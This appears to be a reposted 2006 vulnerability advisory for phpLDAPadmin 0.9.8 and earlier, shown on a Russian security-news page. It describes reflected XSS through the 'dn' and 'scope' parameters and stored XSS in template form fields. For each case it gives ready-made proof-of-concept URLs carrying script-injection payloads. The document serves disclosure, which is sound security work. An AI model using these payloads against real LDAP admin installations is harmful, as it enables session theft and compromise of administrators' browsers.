Уведомление о безопасности: phpLDAPadmin multiple vuln.

[RU] switch to
English Version

Дополнительная информация
  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl)
  r57shell.php <= 1.3 XSS
  bloggage Remote SQL Injection
  [eVuln] MWNewsletter SQL Injection and XSS Vulnerabilities
  BK Forum <<--V.4.0 SQL Injection

From: r0t <krustevs_(at)_googlemail.com>
Date: 21 апреля 2006 г.
Subject: phpLDAPadmin multiple vuln.

phpLDAPadmin multiple vuln.

###############################################
Vuln. discovered by : r0t
Date: 21 april 2006
vendorlink:http://phpldapadmin.sourceforge.net/
affected versions:phpLDAPadmin 0.9.8 and prior
orginal advisory:
http://pridels.blogspot.com/2006/04/phpldapadmin-multiple-vuln.html
###############################################

Vuln. Description:

phpLDAPadmin contains a flaw that allows a remote cross site scripting
attack. This flaw exists because input passed to "dn" paremeter in
"compare_form.php","copy_form.php","rename_form.
php","template_engine.php","delete_form.php"
isn't properly sanitised before being returned to the user.
And input passed to "scope" parameter in "search.php" isn't properly
sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust relationship between the
browser and the server, leading to a loss of integrity.

example:

/compare_form.php?server_id=0&dn=%22%3Cscript
%3Ealert('r0t')%3C/script%3E

/copy_form.php?server_id=0&dn=%22%3Cscript%3E
alert('r0t')%3C/script%3E

/rename_form.php?server_id=0&dn=%22%3Cscript
%3Ealert('r0t')%3C/script%3E

/template_engine.php?server_id=0&dn=%22%3Cs
cript%3Ealert('r0t')%3C/script%3E

/delete_form.php?server_id=0&dn=%22%3Cscript
%3Ealert('r0t')%3C/script%3E

/search.php?server_id=0&search=true&filter=
objectClass%3D%2A&base_dn=cn%3Dtoto%2Cdc%3D
example%2Cdc%3Dcom&form=advanced&scope=%22%
3Cscript%3Ealert('r0t')%3C/script%3E

And there also script insertion vuln. or html injection:

Like i say , take in example "/template_engine.php" and let input in
Container DN : [XSS]
Machine Name: [XSS]
UID Number:    [XSS]
Those fields isn't sanitised before being stored in the vuln. system. This
can be exploited to execute arbitrary script code in a user's browser
session in context of an affected website when a malicious system entry is
viewed.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

test server